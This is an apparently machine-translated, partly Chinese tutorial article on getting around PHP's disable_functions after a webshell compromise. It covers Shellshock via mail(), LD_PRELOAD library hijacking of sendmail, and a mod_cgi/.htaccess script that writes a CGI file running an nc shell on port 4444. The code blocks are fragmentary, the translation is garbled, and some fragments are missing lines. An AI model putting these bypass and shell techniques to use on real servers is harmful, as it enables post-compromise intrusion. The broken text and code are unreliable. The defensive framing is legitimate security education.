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Summary of bypass disable functions executing PHP system commands

2018-05-16 11:28:161943browse

This time I will bring you a summary of bypass disable functions executing PHP system commands. What are the precautions for bypass disable functions executing PHP system commands? The following is a practical case, let's take a look.

1. Why bypass disable functions

For the sake of security, many operation and maintenance personnel will disable some "dangerous" functions of PHP, such as eval, exec, system, etc., writing them in the php.ini configuration file is what we call disable functions, especially Virtual Host operators, in order to completely isolate customers on the same server, and avoid Large-scale security issues arise, and the settings of disable functions are usually stricter.

Attack and defense are opposites and complementary to each other. Since there are measures to disable functions, some people will try their best to break through this restriction. We can only master the methods and principles of breakthroughs. Only in this way can we better prevent such attacks.

Executing system commands is usually a necessary operation for attackers to take further actions after getting the website webshell. If the system commands cannot be executed, it will be difficult for further in-depth attacks to continue, so there is website management. Or disable functions like exec and system. However, with the continuous advancement of technology, new ideas are constantly emerging. Simply disabling these functions cannot prevent attackers from executing system commands in some cases. So what methods do attackers use to break through disable functions? Woolen cloth? How do we protect against such attacks?

2. Arbitrary command execution caused by Bash vulnerability

GNU Bash environment variable remote command execution vulnerability (CVE-2014-6271) is a GNU A remote code execution vulnerability in Bash. In the introduction to this CVE, you can see this description: "There is a security vulnerability in GNU Bash 4.3 and earlier versions. This vulnerability results from the program not correctly processing function definitions within environment variable values. A remote attacker can exploit this vulnerability to execute arbitrary code by using specially crafted environment variables. The following products and modules may be exploited: ForceCommand function in OpenSSH sshd, mod_cgi and mod_cgid modules in Apache HTTP Server, DHCP client, etc." In fact, PHP can also use this vulnerability to do many things, and it may even lead to remote command execution directly at 80. For details about this vulnerability, please refer to the relevant information of CVE-2014-6271, which will not be described here.

Let’s take a look at where this vulnerability in bash can be used in PHP? In fact, it can be used in more than one place. Here we take the mail function as an example. The same applies to other places and you can analyze it by yourself.

PHP's mail function provides 3 required parameters and 2 optional parameters. Here we mainly look at the last parameter. The description of the last parameter in the official PHP manual:

“Theadditional_parameters parameter can be used to pass an additional parameter tothe program configured to use when sending mail using the sendmail_pathconfiguration setting. For example, this can be used to set the envelope senderaddress when using sendmail with the -f sendmail option.
Theuser that the webserver runs as should be added as a trusted user to thesendmail configuration to prevent a ‘X-Warning' header from being added to themessage when the envelope sender (-f) is set using this method. For sendmailusers, this file is /etc/mail/trusted-users. “

Simply put, this parameter can be used as a configuration when sending emails by adding additional commands. For example, the -f parameter can be used to set the email sender, etc. The official document is also demonstrated in Example #3, specifically You can refer to the official documentation: http://php.net/manual/zh/function.mail.php.

In the source code of mail function mail.c, we can find the following code snippet:

if (extra_cmd != NULL) {
       spprintf(&sendmail_cmd, 0,"%s %s", sendmail_path, extra_cmd);
    } else {
       sendmail_cmd = sendmail_path;

If the fifth parameter (extra_cmd) is passed, use spprintf to splice sendmail_path and extra_cmd to sendmail_cmd (where sendmail_path is the sendmail_path configuration item in php.ini), and then throw sendmail_cmd to popen for execution:

#ifdef PHP_WIN32
    sendmail = popen_ex(sendmail_cmd,"wb", NULL, NULL TSRMLS_CC);
    /* Since popen() doesn't indicate if theinternal fork() doesn't work
    *(e.g. the shell can't be executed) we explicitly set it to 0 to be
    *sure we don't catch any older errno value. */
    errno = 0;
    sendmail = popen(sendmail_cmd,"w");

If the system default sh is bash, popen will spawn the bash process, and we just mentioned The CVE-2014-6271 vulnerability directly allows us to use the mail() function to execute arbitrary commands and bypass the disable_functions restriction. But there is actually a problem here, that is, extra_cmd does a security check before spprintf. My current PHP version is the latest 7.2.4, and the code location is at lines 371-375 of mail.c:

 if (force_extra_parameters) {
       extra_cmd =php_escape_shell_cmd(force_extra_parameters);
    } else if (extra_cmd) {
       extra_cmd =php_escape_shell_cmd(ZSTR_VAL(extra_cmd));

php_escape_shell_cmd The function will escape special characters (including `|*?~a8093152e673feb7aba1828c43532094^()[]{}$\, \x0A and \xFF. ', etc.). Is this correct? Nothing can be done? No, we can use the putenv function to set an environment variable containing custom function, and then trigger it through the mail function. There are already POCs on the Internet.

The PHP function that also calls the popen derived process is imap_mail, or there may be other functions that we have not discovered, so if you want to prevent this type of attack, the best way is to start from the root cause and repair the CVE -2014-6271 This bash vulnerability.


上文说到mail函数利用bash破壳漏洞可以实现突破disable functions的限制执行系统命令,但是像这样的漏洞,一般安全意识稍好一点的运维人员,都会打上补丁了,那么是不是打上补丁之后就一定安全了呢?显然答案是否定的,LD_PRELOAD是Linux系统的下一个有趣的环境变量:



使用readelf -Ws /usr/sbin/sendmail命令来查看,我们发现sendmail函数在运行过程动态调用了很多标准库函数,我们从中随便选取一个库函数geteuid进行测试。


#include <stdio.h>    
void payload() {
int geteuid() {
if(getenv("LD_PRELOAD") == NULL) { return 0; }


[[email protected]]# gcc -c -fPIC hack.c -o hack
[[email protected]]# gcc -shared hack -o hack.so


mail("[email protected]","","","","");




其实对于这个问题,早在2008年就有人向PHP官方反馈过,只不过PHP给出的回复是你最好禁用putenv函数: https://bugs.php.net/bug.php?id=46741 ,所以我们有理由相信在后续的PHP版本中也不会对这个问题有什么针对性的解决方案。



关于mode_cgi,可以参考apache的官方说明:  http://man.chinaunix.net/newsoft/ApacheManual/mod/mod_cgi.html 。

“任何具有mime类型application/x-httpd-cgi或者被 cgi-script处理器(Apache 1.1或以后版本)处理的文件将被作为CGI脚本对待并由服务器运行, 它的输出将被返回给客户端。通过两种途径使文件成为CGI脚本,或者文件具有已由 AddType指令定义的扩展名,或者文件位于 ScriptAlias目录中。”,这就表示,apache允许WEB服务器与可执行文件进行交互,这就意味着,你可以用C或者python编写WEB应用,听起来我们好像可以做任何apache权限用户能做的事情了,那么到底如何实现呢?


在apache的配置中,有一个非常重要的指令,Options,Options指令是Apache配置文件中一个比较常见也比较重要的指令,Options指令可以在Apache服务器核心配置(server config)、虚拟主机配置(virtual host)、特定目录配置(directory)以及.htaccess文件中使用。Options指令的主要作用是控制特定目录将启用哪些服务器特性。关于Options指令后可以附加的特性选项的具体作用及含义,可以参考这篇文章: http://www.365mini.com/page/apache-options-directive.htm ,当然我们用到的就是ExecCGI选项,表示允许使用mod_cgi模块执行CGI脚本。除了Options,我们还要配合另外一个AddHandler指令来使用,如果你对AddHandler不太熟悉没关系,这么解释一下就容易理解多了:AddType我们肯定很熟悉,比如配置apache对PHP的支持的时候,经常会添加一行类似AddTypeapplication/x-httpd-php .php这样的配置,这其实是指定了文件扩展名和内容类型之间的映射关系,而AddHandler则是指定扩展名和处理程序之间的关系,也就是说,可以指定某个特定的扩展名的文件,如何来进行处理。



$cmd = "nc -c&#39;/bin/bash&#39; 4444"; //反弹一个shell出来,这里用本地的4444端口
$shellfile ="#!/bin/bash\n"; //指定shell
$shellfile .="echo -ne \"Content-Type: text/html\\n\\n\"\n"; //需要指定这个header,否则会返回500
$shellfile .="$cmd"; 
functioncheckEnabled($text,$condition,$yes,$no) //this surely can be shorter
  echo "$text: " . ($condition ?$yes : $no) . "<br>\n";
  @file_put_contents(&#39;.htaccess&#39;,"\nSetEnv HTACCESS on", FILE_APPEND); 
  header(&#39;Location: &#39; . $_SERVER[&#39;PHP_SELF&#39;]. &#39;?checked=true&#39;); //执行环境的检查
  $modcgi = in_array(&#39;mod_cgi&#39;,apache_get_modules()); // 检测mod_cgi是否开启
  $writable = is_writable(&#39;.&#39;); //检测当前目录是否可写
  $htaccess = !empty($_SERVER[&#39;HTACCESS&#39;]);//检测是否启用了.htaccess
  if(!($modcgi && $writable&& $htaccess))
    echo "Error. All of the above mustbe true for the script to work!"; //必须满足所有条件
up.htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded!Saved in 
.htaccess.bak","Failed!"); //备份一下原有.htaccess
    checkEnabled("Write shellfile",file_put_contents(&#39;shell.dizzle&#39;,$shellfile),"Succeeded!","Failed!");//写入文件
    echo "Executing the script now.Check your listener <img src = &#39;shell.dizzle&#39; style =&#39;display:none;&#39;>"; //调用







 http://wooyun.jozxing.cc/static/drops/papers-15589.html 。



COM 组件

Windows environment, when the setting item com.allow_dcom =true of php.ini, you can execute system commands through the COM component, or even turn on the safe mode. For relevant information, please refer to: https:// www.exploit-db.com/exploits/4553/.


win32std is a very old PHP extension. The win_shell_execute function can be used to execute Windows system commands: https://www.exploit-db. com/exploits/4218/ .

6. Summary

For intruders, after getting a webshell, if they want to further obtain higher permissions or With so much data and information, it is almost necessary to execute system commands. When we have some flaws in our PHP application and are invaded, how to minimize the loss becomes the primary issue. From the methods listed in this article, it is not difficult to see that as long as you master these principles, prevention work is very simple and effective. As long as you often pay attention to security dynamics, you can completely defend against the above bypass measures.

I believe you have mastered the method after reading the case in this article. For more exciting information, please pay attention to other related articles on the php Chinese website!

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The above is the detailed content of Summary of bypass disable functions executing PHP system commands. For more information, please follow other related articles on the PHP Chinese website!

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